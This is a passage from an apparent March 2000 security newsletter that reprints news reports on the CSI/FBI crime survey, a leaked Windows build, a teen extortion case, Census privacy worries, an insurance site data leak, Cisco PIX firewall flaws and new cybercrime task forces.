From HNN http://www.hackernews.com/
contributed by Evil Wench
The Computer Security Institute and the San Francisco
FBI Computer Intrusion Squad jointly released a report
today that said that electronic crime cost companies at
least $266 million last year. The study found that 70%
of the responding companies detected the unauthorized
use of their computer systems in the last 12 months up
from 62% the year before. Insiders and disgruntled
employees topped the lists of worrisome security
threats. (One conclusion that can be drawn form this
study is that e-crime is on the rise, another is that
people are more willing to admit intrusions or that
detection of criminal activity has gotten better. The
numbers are interesting but really don't say anything.)
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2471718,00.html?chkpt=zdnntop
Late Update 0943EST
An anonymous person was kind enough to send us a link
directly to the summary results of the above mentioned
survey.
Computer Security Institute
http://www.gocsi.com/prelea_000321.htm
ZDNet;
Report: 'E-crime is booming'
Some 70 percent of companies queried in a new study have detected attacks
on their networks, the FBI/CSI reports.
By Robert Lemos, ZDNet News UPDATED March 22, 2000 10:00 AM PT
SAN FRANCISCO -- Just like e-commerce, electronic crime is a booming
business, according to a survey released by the Computer Security
Institute and the San Francisco FBI Computer Intrusion Squad on Wednesday.
The study found that 70 percent of CSI's 585 member companies that
responded to its survey detected the unauthorized use of their computer
systems in the last 12 months -- up from 62 percent the year before.
"Isn't e-commerce booming? Then e-crime is booming," said Richard Power,
editorial director and analyst for the Computer Security Institute.
"The Internet revolution is going on regardless, but the more commerce
that goes online, the more crime that goes online as well."
While not a scientific estimate of computer crime, the report does measure
the anonymous admissions of more than 640 security professionals who are
part of CSI.
Insiders the biggest fear More than three-quarters of those
professionals identified hackers as a security threat, but insiders
concerned the respondents more, with 81 percent worried about disgruntled
employees.
CSI's Power explained that professional hackers are more of a threat,
however. "That's the real problem, not a juvenile hacker," he said. "The
point is, if a 16-year-old kid can do (what we have seen), then what are
the professionals doing?"
The report also indicates that corporate computer systems are far from
secure. Almost 90 percent of the security professionals who answered the
survey detected a security threat, which includes unauthorized access as
well as improper use of a corporate computer or e-mail and computer
viruses.
Of those intrusions, only 42 percent of the companies affected put a
dollar sign on the amount of damage done. The total: $266 million.
With only one computer security administrator per 1,000 computers, the
situation may not get any better soon.
-=-
CSI;
Mar 22,2000
FOR IMMEDIATE RELEASE
Contact: Patrice Rapalus, Director
Computer Security Institute
600 Harrison Street
San Francisco, CA 94107
415/905-2310
Internet: prapalus@cmp.com
Ninety percent of survey respondents detect cyber attacks, 273 organizations
report $265,589,940 in financial losses
SAN FRANCISCO -- The Computer Security Institute (CSI) announced today the
results of its fifth annual "Computer Crime and Security Survey." The
"Computer Crime and Security Survey" is conducted by CSI with the
participation of the San Francisco Federal Bureau of Investigation's (FBI)
Computer Intrusion Squad. The aim of this effort is to raise the level of
security awareness, as well as help determine the scope of computer crime
in the United States.
Highlights of the "2000 Computer Crime and Security Survey" include the
following:
Ninety percent of respondents (primarily large corporations and
government agencies) detected computer security breaches within the
last twelve months.
Seventy percent reported a variety of serious computer security
breaches other than the most common ones of computer viruses, laptop
theft or employee "net abuse"--for example, theft of proprietary
information, financial fraud, system penetration from
outsiders, denial of service attacks and sabotage of data or
networks.
Seventy-four percent acknowledged financial losses due to computer
breaches.
Forty-two percent were willing and/or able to quantify their
financial losses. The losses from these 273 respondents totaled
$265,589,940 (the average annual total over the last three years was
$120,240,180).
Financial losses in eight of twelve categories were larger than in any
previous year. Furthermore, financial losses in four categories were
higher than the combined total of the three previous years. For example,
6I respondents quantified losses due to sabotage of data or networks
for a total of $27,148,000. The total financial losses due to sabotage for
the previous years combined totaled only $10,848,850.
As in previous years, the most serious financial losses occurred through
theft of proprietary information (66 respondents reported $66,708,000) and
financial fraud (53 respondents reported $55,996,000).
Survey results illustrate that computer crime threats to large
corporations and government agencies come from both inside and outside
their electronic perimeters, confirming the trend in previous years.
Seventy-one percent of respondents detected unauthorized access by
insiders. But for the third year in a row, more respondents (59%) cited
their Internet connection as a frequent point of attack than cited their
internal systems as a frequent point of attack (38%).
Based on responses from 643 computer security practitioners in U.S.
corporations, government agencies, financial institutions, medical
institutions and universities, the findings of the "2000 Computer Crime
and Security Survey" confirm that the threat from computer crime and
other information security breaches continues unabated and that the
financial toll is mounting.
Respondents detected a wide range of attacks and abuses. Here are some
other examples:
25% of respondents detected system penetration from the outside.
27% of respondents detected denial of service attacks.
79% detected employee abuse of Internet access privileges
(for example, downloading pornography or pirated software,
or inappropriate use of e-mail systems).
85% detected computer viruses.
For the second year, we asked some questions about electronic commerce over
the Internet. Here are some of the results:
93% of respondents have WWW sites.
43% conduct electronic commerce on their sites (in 1999, only it was only 30%).
19% suffered unauthorized access or misuse within the last twelve months.
32% said that they didn't know if there had been unauthorized access or misuse.
35% of those acknowledging attack, reported from two to five incidents.
19% reported ten or more incidents.
64% of those acknowledging an attack reported Web-site vandalism.
60% reported denial of service.
8% reported theft of transaction information.
3% reported financial fraud.
Patrice Rapalus. CSI Director, suggests that the "Computer Crime and
Security Survey," now in its fifth year, has delivered on its promise to
raise the level of security awareness and help determine the scope of
crime in the United States.
"The trends the CSI/FBI survey has highlighted over the years are
disturbing. Cyber crimes and other information security breaches are
widespread and diverse. Ninety percent of respondents reported attacks.
Furthermore, such incidents can result in serious damages. The 273
organizations that were able to quantify their losses reported a total of
$265,589,940. Clearly, more must be done in terms of adherence to sound
practices, deployment of sophisticated technologies, and most importantly
adequate staffing and training of information security practitioners in
both the private sector and government."
Bruce J. Gebhardt is in charge of the FBI's Northern California office.
Based in San Francisco, his division covers fifteen counties, including
the continually expanding "Silicon Valley" area. Computer crime is one of
his biggest challenges.
"If the FBI and other law enforcement agencies are to be successful in
combating this continually increasing problem, we cannot always be placed
in a reactive mode, responding to computer crises as they happen. The
results of the CSI/FBI survey provide us with valuable data. This
information not only has been shared with Congress to underscore the need
for additional investigative resources on a national level but identifies
emerging crime trends and helps me decide how best to proactively, and
aggressively assign resources, before those 'trends' become 'crises.'"
###
CSI, established in 1974, is a San Francisco-based association of
information security professionals. It has thousands of members worldwide
and provides a wide variety of information and education programs to
assist practitioners in protecting the information assets of corporations
and governmental organizations.
The FBI, in response to an expanding number of instances in which
criminals have targeted major components of information and economic
infrastructure systems, has established the National Infrastructure
Protection Center (NIPC) located at FBI headquarters and the
Regional Computer Intrusion Squads located in selected offices throughout
the United States. The NIPC, a joint partnership among federal agencies
and private industry, is designed to serve as the government's lead
mechanism for preventing and responding to cyber attacks on the nation's
infrastructures. (These infrastructures include telecommunications,
energy, transportation, banking and finance, emergency services and
government operations). The mission of Regional Computer Intrusion Squads
is to investigate violations of Computer Fraud and Abuse Act (Title 8,
Section 1030), including intrusions to public switched networks, major
computer network intrusions, privacy violations, industrial espionage,
pirated computer software and other crimes
Copyright 2000
Computer Security Institute
600 Harrison Street
San Francisco, CA 94107
Telephone: (415) 905-2626
Fax: (415) 905-2218.
@HWA
58.0 HNN:Mar 22nd:The Next Version of Windows Leaked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
While Windows 2000 only just recently shipped Microsoft
is already working on the next generation of the
operating system. Code named Whistler, build 2211.1
has been liberally spread around pirate sites across the
net.
Beta News
http://betanews.efront.com/article.php3?sid=953595359
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2471310,00.html?chkpt=zdnntop
Beta;
Whistler Hits the Web
By Nate Mook, eFront March 20th, 2000, 6:35 PM
An internal build of Microsoft's future operating system, set to combine
consumer and business versions into a product currently codenamed Whistler
Windows 2001, has leaked out onto the Internet. Build number 2211.1
was posted onto various college and Internet sites early this morning and
spread as per usual, like wildfire.
While the new operating system currently looks almost identical to Windows
2000, a number of people who installed the leaked build stated there were
a few HTML enhancements to folders, simplifying things for novice
users. For example, the control panel is now by default an HTML interface,
offering access to a few basic configuration options.
Whistler does contain the infamous MarsCore.DLL file which started rumors
last month regarding the purpose of Mars, now known to be part of the
future version of Microsoft's MSN client. However, it is unknown
whether or not the new HTML folders are part of the Mars core or if users
will be given the opportunity to switch off more user friendly parts of
the operating system.
As usual with an early Alpha release, most new features and enhancements
will not be added until Beta 1. Keep checking back for continued coverage
regarding Microsoft Whistler.
ActiveWin contributed to this report.
-=-
ZDNet;
Windows 2001 leaked on the Web
A pirated version of Windows 2001 is winding its way across the Net. And
it looks a lot like today's Windows.
By Mary Jo Foley, ZDNet News UPDATED March 21, 2000 2:03 PM PT
Microsoft Corp.'s next full-fledged version of Windows, code-named
Whistler, is at least a year away from release -- but already a pirated
version of one of the latest builds has found its way onto the Net.
As reported by the Windows enthusiast sites ActiveWin and BetaNews, a
recent internal build of Whistler has been posted illegally to a number of
college and Internet sites.
ActiveWin and BetaNews are reporting that Build 2211.1 was posted Tuesday
morning and "spread as per usual, like wildfire."
Whistler is the code name for the first full-fledged upgrade to Windows
2000 that will be based on the Windows NT kernel, rather than the Windows
9X kernel. (The Windows 9X update is code-named Millennium and expected to
ship in the third or fourth quarter of this year.) Whistler is tentatively
slated to ship in March 2001, according to internal Microsoft documents.
Microsoft (Nasdaq: MSFT) won't comment on where Whistler is in the
development process. But sources close to the company say the latest
"stable" internal developers build is numbered 2207. The most recent
internal test build is 2214, sources add.
A Microsoft spokesman said the company was investigating reports of
pirated Whistler builds but would make no further comment.
Looks like Win2000 -- so far As noted by ActiveWin, the pirated
Whistler build looks almost identical to Windows 2000 Professional.
"A number of people who installed the leaked build stated there were a few
HTML enhancements to folders, simplifying things for novice users,"
ActiveWin reported. "For example, the control panel is now by default an
HTML interface, offering access to a few basic configuration options."
One change under the hood, according to ActiveWin, is the inclusion of the
MarsCore.DLL file. "Mars" is the code name for user interface technology
slated to be included in a future version of Microsoft's MSN client. At
one point, Mars was used as the code name for the next version of a
consumer-oriented version of Internet Explorer. After signing up Mars beta
testers last fall, Microsoft sent out a note telling testers it had
delayed the start of the beta because the company was "rethinking some of
our most basic assumptions" regarding the future user interfaces.
It isn't just in the user interface that Microsoft has been redrawing its
Windows road map.
In January, Microsoft acknowledged that it had tabled work on "Neptune," a
consumer version of Windows slated to follow Millennium, and on "Odyssey,"
an NT-kernel-based follow-on to Windows 2000. Instead, Microsoft said, it
planned to merge the Neptune and Odyssey code bases in the form of
Whistler.
The follow-on to Whistler, code-named Blackcomb, is expected to ship in
2002 or later.
@HWA
59.0 HNN:Mar 22nd:Toronto Business Held For Extortion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
An unnamed business in the Toronto area was held for
ransom of less than $5,000 after a 14 year old youth
took control of the companies chat-room and email
servers. Police arrested the individual after arranging a
meeting to deliver the money. The youth has been
charged with extortion, mischief to data, fraudulently
possessing a computer password, production and
possession of counterfeit money, and two counts of
unauthorized use of a computer. (And they say there
are not enough computer crime laws.)
National Post
http://www.nationalpost.com/news.asp?f=991222/158060&s2=national&s3=news
Wednesday, December 22, 1999
14-year-old computer whiz
charged after company given
extortion demand
Arrested in Keswick
Chris Eby
National Post
A 14-year-old computer whiz, who allegedly hacked into the
accounts of a downtown Toronto business and tried to extort the
owners, was charged yesterday with a raft of extortion and
counterfeiting-related offences after a police sting operation.
The boy, who cannot be named under the Young Offenders Act,
took control of the business's e-mail and chat rooms -- two
operations vital to the business' survival -- for two weeks. He
contacted the owner of the business through the Internet, demanding
cash before he returned control of the accounts.
"He obviously displays a capability in computers that appears to be
above average," said Detective Myron Demkiw. "They're pretty
serious offences ... this is all relatively new ground for everybody."
The owner of the business contacted police, who traced the suspect
to Keswick, a town 60 kilometres north of Toronto.
Investigators arranged a meeting on Monday where the suspect was
supposed to receive the money he was demanding (a sum less than
$5,000 was all police would say), and was arrested.
"He was calm throughout," Det. Demkiw said of the youth.
As a result of the investigation, detectives executed a search warrant
on the boy's home and seized his computer, related documents, and
some counterfeit money.
When asked if he had ever come across anything like this, Det.
Demkiw replied: "No, never, and and this will be something new to
the courts as well."
The youth has been charged with extortion, mischief to data,
fraudulently possessing a computer password, production of
counterfeit money, and two counts each of unauthorized use of a
computer, and possession of counterfeit money.
@HWA
60.0 HNN:Mar 22nd:Is the Census Secure?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
The long form of the US Census has sparked privacy
concerns ever since it was introduced in 1960. With the
increased awareness of computer security and identity
theft those fears are even greater. Some residents fear
giving out their personal information on the off chance
that it may be stolen or otherwise fall into the wrong
hands. The Census Bureau has taken some solace in the
fact that it has never suffered a computer related
break-in.
Philidelphia Inquirer
http://www.phillynews.com/inquirer/2000/Mar/21/front_page/PCENSUS21.htm
Census queries raising computer-security questions
New inquiries strike some as an opening to hackers or invasions of privacy.
Bureau officials say fears could reduce responses.
By Thomas Ginsberg
INQUIRER STAFF WRITER
Betty McAdams is afraid computer hackers could steal her personal information.
Joe Alessandroni figures marketers somehow will buy his. Entire Web sites
question the government's right to the data at all.
In the last two weeks, about 15 million Americans began receiving the most
intrusive government questionnaire most will ever fill out. The "Long
Form" from the U.S. Census Bureau - 37 pages filled with 53 questions
about everything from language skills to toilets - is prompting some
recipients to squeal about invasion of privacy, a complaint that has
arisen every decade since the long form was launched in 1960.
This year, however, Census officials and privacy experts said they detect
a more pointed fear: concern about computer security. The growth of the
Internet since the 1990 Census along with high-profile attacks on Web
sites such as Yahoo have exacerbated already-rising concerns about the
safety of any information on any computer anywhere.
"Alarmed is a good word," said McAdams, 51, of Philadelphia, an assistant
director of Greater Philadelphia First, an alliance of business executives
in the region. "I assume they're going to compile all this information on
a computer somewhere. . . . Probably if [computer hacking] had not
happened so recently, I might not be as alarmed."
To increasing numbers of people, the country is facing a "privacy
Chernobyl," said Robert R. Belair, a Washington-based privacy lawyer and
editor of a national newsletter on business privacy. "It doesn't surprise
me that the Census Bureau is going to have more trouble this year than
before."
Unfortunately, some salient facts get lost in the din: The Census Bureau
has never suffered a computer-related security breach, experts agree.
Its computers are kept separate from other government systems, and
respondents' names are separated from personal data when the results are
eventually compiled into databases, Census officials say.
Moreover, since the 1930s, the Census Bureau, backed by the U.S. Supreme
Court, has jealously guarded its records; in 1942, it even rebuffed a
demand from the U.S. War Department for information on potential draftees.
Census officials, for their part, take the once-a-decade privacy
complaints in stride as they collect the statistics for use in redrawing
congressional districts and determining federal funding formulas.
Questions about household income, for example, are used to estimate the
number of subsidized lunches the neighborhood school might have to
provide.
This year's new question about whether a resident provides primary care
for a grandchild is linked to welfare allocations.
Maury Cagle, a bureau spokesman, said that even though the agency's
confidentiality record is clean, "people have an ingrained suspicion about
computers and private information. All of those things add to the falling
response rate."
The Census Bureau projects its response rate for the 2000 Census will hit
its lowest level ever: 61 percent, down from 75 percent in 1980.
As the response rate drops, the government has to hire ever more
head-counters - "enumerators," in bureau jargon - to brave back streets
and barking dogs to get the information personally.
This year, the Census Bureau is mounting a $230 million outreach campaign
designed to raise the response rate and keep down the expense of
enumerators.
Still, "people are a little more testy" about giving out personal
information than in years past, said Gorden DeJong, director of
Pennsylvania State University's Population Research Institute.
DeJong and others blame everything: a spate of high-profile computer
attacks; rising concerns about confidentiality; a constant if sometimes
fluctuating distrust of government; and an ever-widening flood of private
surveys and junk mail with which Americans already contend.
"For the number of things I get in the mail, I already must be on 50
lists," said Alessandroni, 84, a retired lawyer from Philadelphia. "It's
pretty obvious to me that there's no such thing as secrecy. . . . The
information is bound to get around."
In the last two weeks, either the long form or a separate three-page short
form was mailed to 113 million households.
An additional 22 million households with incomplete addresses or post
office boxes were having their forms hand-delivered. Households that don't
return the form by April 1 may get a visit from an enumerator.
Every sixth household got a long form. The ratio was set by a scientific
sampling formula, and people may not fill out a long form unless they were
selected, said Phillip Lutz, assistant regional manager for the Census
region comprising Pennsylvania, New Jersey, Maryland, Delaware, and
Washington.
Each form arrives bearing the bold-faced words: "Your Response is Required
by Law." What is not written is the fact that the $100 fine for failing to
respond - a fine dating to at least 1954 - apparently has not been imposed
in decades, even though federal courts have upheld the constitutionality
of the participation law.
"We're not interested in fining people. We're interested in collecting
information," Lutz said.
Still, some people are willing, even eager, to pay the fine rather than
give up personal information.
"I wrote the number of people living in my house and enclosed a $100
check," said a 41-year-old participant in an Internet chat room about the
Census, who spoke on condition that only his first name, Greg, be printed.
"Why is it any of their business how I am paying or have paid for my
home?"
So far, the refusers appear to be in the minority. State and local
officials across the country have joined with community and immigrant
groups to push for full participation, arguing that the sacrifice pays off
in federal funding.
Pennsylvania officials have estimated that each person counted in
Philadelphia is worth an average of $2,200 in federal funds.
"The very people who are not participating need to be counted so they can
have government services in their neighborhood," said Kate Kunda, 45, a
Spanish teacher from Wayne, Delaware County.
As for herself, Kunda added: "I was annoyed that they wanted to know about
my electricity bill and mortgage, but we did make an effort to fill it
out."
@HWA
61.0 HNN:Mar 23rd:Insurance Co. Reveals Personal Info on Web
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by acopalyse
A software glitch allowed visitors to Selectquote.com to
view the personal information of the previous visitor. At
least 20 users had everything from name and address to
current insurance coverage and parents health histories
revealed.
MSNBC
http://www.msnbc.com/news/385464.asp?0m=T12R
Insurance site exposes personal data
Glitch on Selectquote site reveals information to next user
By Mike Brunker
MSNBC
March 22 � Consumers who requested online life
insurance quotes from Selectquote.com on
Tuesday and Wednesday got more than they
bargained for: Thanks to a software glitch, their
personal information was left on the company�s
Web site for the next user to see.
THE PROBLEM occurred when a form that
consumers fill out to request a quote failed to clear the
contents at the end of the process. This left everything from
the previous user�s name and address to information on
current coverage and parents� health histories plainly visible
to the next person to request a quote.
Lyle Griffin, a spokesman for Selectquote, said the
problem occurred when programmers fixed a piece of code
on the site that was causing a problem for users with an
older version of Internet Explorer. Unfortunately, the fix
created a problem in the quote request form, he said.
The problem lasted from 4 p.m. PT on Tuesday until
about 10 a.m. PT Wednesday, but it affected only about 20
users who were directed to a newly designed Selectquote
site that is still being tested, Griffin said.
.Not to minimize it,. he said of the problem.
.Obviously this is extremely embarrassing..
MSNBC.com was alerted to the problem late
Tuesday by a prospective Selectquote customer,
who was outraged that other visitors to the site
were able to view her personal information.
.About 10 minutes (after filling out the form) I got a call
from a woman in Ohio who said, �I�m just someone who�s
on Selectquote and all your information is prepopulated in
the questionnaire,�. said Ona Karasa of Bellevue, Wash.
She said she went back on the site Wednesday
morning and saw the information of two other people who
apparently had just requested life-insurance quotes using the
online service. MSNBC editors also were able to access
personal information entered by other users until
midmorning Wednesday.
Another user, Richard Underwood of Rockville, Md.,
said he was alerted to the problem early Wednesday by
e-mail from another Selectquote surfer. He said a company
representative had called and left a message concerning his
request for a quote, but did not mention the Web site
problem.
.Truthfully, I don�t know if I want to talk to anyone at
Selectquote about life insurance at this point,. he said.
Underwood said the experience would likely make him
pause the next time he is prompted to enter personal
information on a Web site.
.I was just getting to the point where I was reasonably
comfortable doing that, but I may have to think twice if this
is how it works,. he said.
@HWA
62.0 HNN:Mar 23rd:Cisco Admits to Big Hole in PIX Firewall
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by acopalyse
Last week Cisco admitted that it is possible to fool the
PIX stateful inspection into opening up arbitrary TCP
ports, which could allow attackers to circumvent
defined security policies. The vulnerabilities effect any
PIX firewall that has enabled FTP which is turned on by
default.
Vnunet
http://www.vnunet.com/News/601083
Networking � John Leyden, Network News [22 Mar 2000]
Cisco admits to serious PIX firewall flaw
Cisco last week admitted that two security vulnerabilities
affecting its PIX firewalls could leave corporate networks
open to attack.
In an interim security notice, the vendor acknowledged the
existence of two related vulnerabilities that both cause its
Secure PIX Firewalls to interpret FTP (File Transfer Protocol)
commands out of context, leaving the networks behind the
firewalls open to penetration.
Cisco said that in certain configurations "it is possible to fool
the PIX stateful inspection into opening up arbitrary TCP
ports, which could allow attackers to circumvent defined
security policies".
All Cisco Secure PIX Firewalls with software versions up to
and including 4.2(5), 4.4(4), and 5.0(3), that are configured
to provide access to FTP services, are at risk from both
vulnerabilities. Cisco admitted that the problem means any
Cisco Secure PIX Firewall that has enabled the fix-up
protocol FTP command could allow unauthorised data to
reach the network it is designed to protect.
Deri Jones, managing director of security tester NTA Monitor,
described the issue as "serious", particularly because Cisco's
offering is currently the third most popular firewall in the
market.
"To Cisco's credit it has issued a bulletin, but has not yet
found any solutions. This will not be trivial to address and
may take it some time," warned Jones.
Clive McCafferty, managing director of security consultant
CenturyCom, said that many users, which include BT, use
Cisco's PIX firewalls for managed services.
"This could allow an attacker to send spurious stuff and then
launch an attack when a port is open," said McCafferty.
The first vulnerability, which remains unfixed, is exercised
when a client inside the firewall browses to an external
server and selects a link that the firewall interprets as two or
more FTP commands. The client begins an FTP connection as
expected, and at the same time unexpectedly executes
another command opening a separate connection through
the firewall.
The only solution Cisco currently suggests for this problem is
disabling incoming FTP services. Any server that permits
internal clients to make arbitrary outbound FTP connections
may be vulnerable to this issue.
The second, related problem is exercised when the firewall
receives an error message from an internal FTP server
containing an encapsulated command that the firewall
interprets as a distinct command. This can be exploited to
open a separate connection through the firewall.
Both vulnerabilities are due to the command fix-up protocol
FTP (portnum), which is enabled by default on the Cisco
Secure PIX Firewall. To exploit the security flaws, attackers
must be able to make connections to an FTP server
protected by the PIX Firewall.
� If you would like to comment on this article email us @
newseditor@vnunet.com
@HWA
63.0 HNN:Mar 23rd:College To Offer Online Crime Fighting Courses
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Lew
A new state-of-the-art computer lab was unveiled by
officials at the College of DuPage in Illinios on Monday at
the college's Suburban Law Enforcement Academy. The
lab will offer police officers (no civilians allowed) courses
in reconstructing an electronic crime scene, as well as
how to present such evidence in court. The lab, valued
at $250,000, was donated by Microsoft Corp. and Omni
Tech Corp.
Chicago Tribune - Registration Required
http://chicagotribune.com/news/metro/dupage/article/0,2669,SAV-0003210202,FF.html
<bleh>
@HWA
64.0 HNN:Mar 23rd:Pittsburgh Gets Computer Crime Task Force
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by acopalyse and Evil Wench
A joint operation of federal and local authorities named
the Pittsburgh High Tech Computer Crimes Task Force
will try to help in the fight against cyber crime. The
Task Force was announced on Tuesday at the
Pittsburgh FBI offices.
Pittsburgh Tribune
http://www.triblive.com/digage/dfbi0323.html
Pittsburgh Post Gazette
http://www.post-gazette.com/regionstate/20000322cybercrime1.asp
Tribune;
FBI installs new task force aimed at fighting cybercrimes
By Erik Siemers
TRIBUNE-REVIEW
The aqua Macintosh G3 computer, its electronic guts
exposed, appeared harmless as it sat on a table in the
Pittsburgh FBI offices Tuesday.
But its hard drive tells investigators a different story - it
was used to print counterfeit corporate checks.
That Macintosh is one of the computers under
examination by the Pittsburgh High Tech Computer
Crimes Task Force.
The medley of federal and local authorities trained to
investigate computer-related crimes was unveiled
yesterday
The task force, one of the first in the nation, pools
experts from local agencies such as Pittsburgh police
with federal agencies such as the Secret Service and the
Internal Revenue Service into one room to combat the rapid growth of cybercrimes.
"Crimes we couldn't have conceived years ago are now routine," said U.S. Attorney Harry S.
Litman, whose office is involved in the task force. "It is critical that we respond to these crimes by
marshaling our resources."
Western Pennsylvania is open to crimes such as hacker attacks and "a whole array of Internet
fraud," partly because it has more software development firms than Silicon Valley, Litman said.
"Our position poses significant vulnerability to cybercrimes," Litman said.
The task force will be free to use each agency's resources along with those at Carnegie Mellon's
Computer Emergency Response Team, said Richard D. Pethia, manager of CERT's networked
systems survivability program. CERT will provide technical assistance to the task force, Pethia said.
Each agency offers one representative to the task force who has been trained in forensic
examinations of computers, said Dan Larkin, supervisor in charge of the FBI's White Collar and
Computer Crimes Division.
Aside from providing intelligence and technical assistance to computer investigations, the task force
will focus on investigations where the Internet was used as the main tool in committing the crime.
Michael Vatis, director of the FBI's National Infrastructure Protection Center in Washington, D.C.,
said all FBI field offices will eventually house task forces similar to Pittsburgh's.
Pittsburgh is one of the initial task force sites partly because "we have a wealth of talent," said John
P. Joyce, assistant special agent in charge of the FBI's Pittsburgh office.
The city also has a good track record for law enforcement agencies working with each other and
with Carnegie Mellon's technology resources, said FBI Special Agent Bill Crowley.
Task force members will use traditional investigation skills along with advanced knowledge of
technology to crack computer cases, said Vatis.
"We need to have the technology to get the digital evidence," Vatis said.
Getting that digital evidence can be as simple as copying the contents of the hard drive for analysis
on its own computers, said Special Agent Tom Hyslip, the Secret Service's representative to the
task force.
"When we go to court we can say we never touched (the evidence)," Hyslip said.
-=-
Gazette;
City at forefront of war on cybercrime
FBI forming task forces to fight crimes of Internet age
Wednesday, March 22, 2000
By Torsten Ove, Post-Gazette Staff Writer
With its aging population and Rust Belt image, Pittsburgh may hardly seem
like the kind of town the federal government would choose as a base for its
war on sophisticated cybercrime.
But yesterday, as local law enforcement officers stood stiffly for the cameras
at FBI headquarters Downtown, authorities announced the creation of the
nation's first task force specifically designed to combat computer intrusion,
Web site vandalism, on-line espionage and other crimes of the rapidly
evolving Internet age.
"This is the future, but it is also very much the present," said Michael Vatis, the
FBI's top cybercop. "This is putting Pittsburgh at the cutting edge of
cybercrime prevention."
The task force, comprised of federal, state and local agencies, is one of 16
planned nationwide in major cities.
Pittsburgh was chosen because of the prevalence of software development
companies here and the presence of Carnegie Mellon University's Computer
Emergency Response Team, the nation's leading cybercrime research facility.
In addition to focusing on complex computer and Internet crimes, FBI officials
said the local task force will provide technical assistance to police
departments in investigations of fraud, child pornography and identity theft that
involve computers.
Vatis, director of the National Infrastructure Protection Center in Washington,
D.C., said computers are changing the face of crime so quickly that law
enforcement agencies have to work together to keep up.
In addition to working to combat large-scale attacks such as the one that
disabled Yahoo!, eBay and other e-commerce Web sites last month, federal
authorities have been scrambling to head off all manner of computer crimes,
from organized hacking of government computers by suspected foreign agents
to amateur vandalism such as that committed by the teen-ager who vandalized
an anti-drug Web site with pictures of Beavis and Butthead.
Locally, FBI Special Agent John P. Joyce said his agency is investigating 30
to 40 cases of computer intrusion and similar crimes, although he wouldn't
reveal details of any of them. Because of their technical nature, each
investigation requires much more expertise than the traditional capers tackled
by FBI agents of old. The new breed of federal crime fighter is more likely to
be an agent sitting at a computer all day than a suit-and-tie swashbuckler with
a gun kicking down doors.
"These cases are a lot more complicated than physical crime," said Vatis, "and
they take a longer time to solve."
Richard D. Pethia of CMU's CERT warned that the "denial of service"
attacks that knocked the Internet companies off-line in February are only the
beginning of new waves of cyberspace assaults. In 1998, he said, his center
examined 4,000 incidents. Last year, the number reached 8,000. This year, it
could double again.
"This problem is real and it's here," he said. "The nasty thing about computer
attacks is that they can be launched from anywhere on the planet."
And it can be nearly impossible to track down the culprits and then prove
they are responsible for specific on-line exploits. The attacks on the
e-commerce companies, for example, remain unsolved, although Vatis said
the FBI is making progress in the case.
Not everyone is convinced the federal government, working with experts in
the private sector, has what it takes to match wits with serious hackers bent
on mayhem.
"If I were a cyber criminal with the FBI after me, I would sleep like a baby,"
said Jay Valentine, president of InfoGlide Corp., an Internet security
company, in a recent Scripps Howard report about Internet security. "Even a
blind squirrel finds a nut, but the FBI will only catch amateurish hackers. The
best ones are a generation ahead of the FBI."
Other critics have blasted the FBI and the National Infrastructure Protection
Center for reacting too slowly to the attacks on 30 university systems last year
that laid the groundwork for the e-commerce shutdown last month.
In a USA Today report, experts -- many of them cybersleuths selling their
services -- also said the government's efforts were hindered by inter-agency
squabbling and the fact that some companies don't trust the FBI enough to
share information with agents.
Vatis wouldn't address the USA Today report except to say that it was
inaccurate.
Regarding the charge of slow government reaction, he said the protection
center issued a warning about the denial-of-service threat in plenty of time.
The National Infrastructure Protection Center's Web site shows the warning
went out on Dec. 30 and included detailed information about what defensive
steps to take.
Still, Vatis acknowledged that government agencies are "still in the process of
getting up to speed."
@HWA
65.0 HNN:Mar 23rd:Business May Be Protected Against FOIA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by acopalyse
To encourage companies to release information about
online attacks a new bill would provide firms with an
exemption to the Freedom of Information Act.
Representatives Tom Davis, R-Va. and Jim Moran, D-Va.
plan to introduce the bill later this week. It is hoped
that this exemption will promote the reporting of cyber
attacks by industry. (And at the same time erode
citizens rights.)
Newsbytes
http://www.newsbytes.com/pubNews/00/146086.html
Bill Would Protect Firms That Share Hacking Info
By David McGuire, Newsbytes WASHINGTON, DC, U.S.A., 21 Mar 2000, 6:00 AM
CST
A new bill aimed at encouraging companies to share information about
hacker attacks would provide firms with a limited exemption from the
Freedom of Information Act (FOIA).
Set to be introduced by Reps. Tom Davis, R-Va. and Jim Moran, D-Va., later
this week, the legislation would allow companies to share information
about cyberattacks with law enforcers and industry groups, without
worrying that such information could come back to haunt them, Davis
staffer David Marin said today.
"The public interest will be served by companies coming forth to share
their information" about attacks, Marin said. Too often now companies do
not report cyberattacks for fear that such reports will find their way
into the media, he said.
While the bill would create a limited shelter under FOIA, it is not
intended to allow companies to mask their business dealings, Marin said.
When the legislation is completed it will be "narrowly tailored to address
(information pertaining to) how the attack was done and what was done to
fix the attack," Marin said. The legislation will apply only to
telecommunications and information technology infrastructure attacks.
Used primarily by the media, FOIA allows members of the press and the
public to file legally binding requests for public documents.
FOIA already contains an exemption for ongoing criminal investigations, by
Davis and Moran are aiming to further protect firms that divulge
information about cyberattacks, Marin said.
Reported by Newsbytes.com, http://www.newsbytes.com .
@HWA
66.0 HNN:Mar 23rd:Teenagers To Receive Deterrent Sentences
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
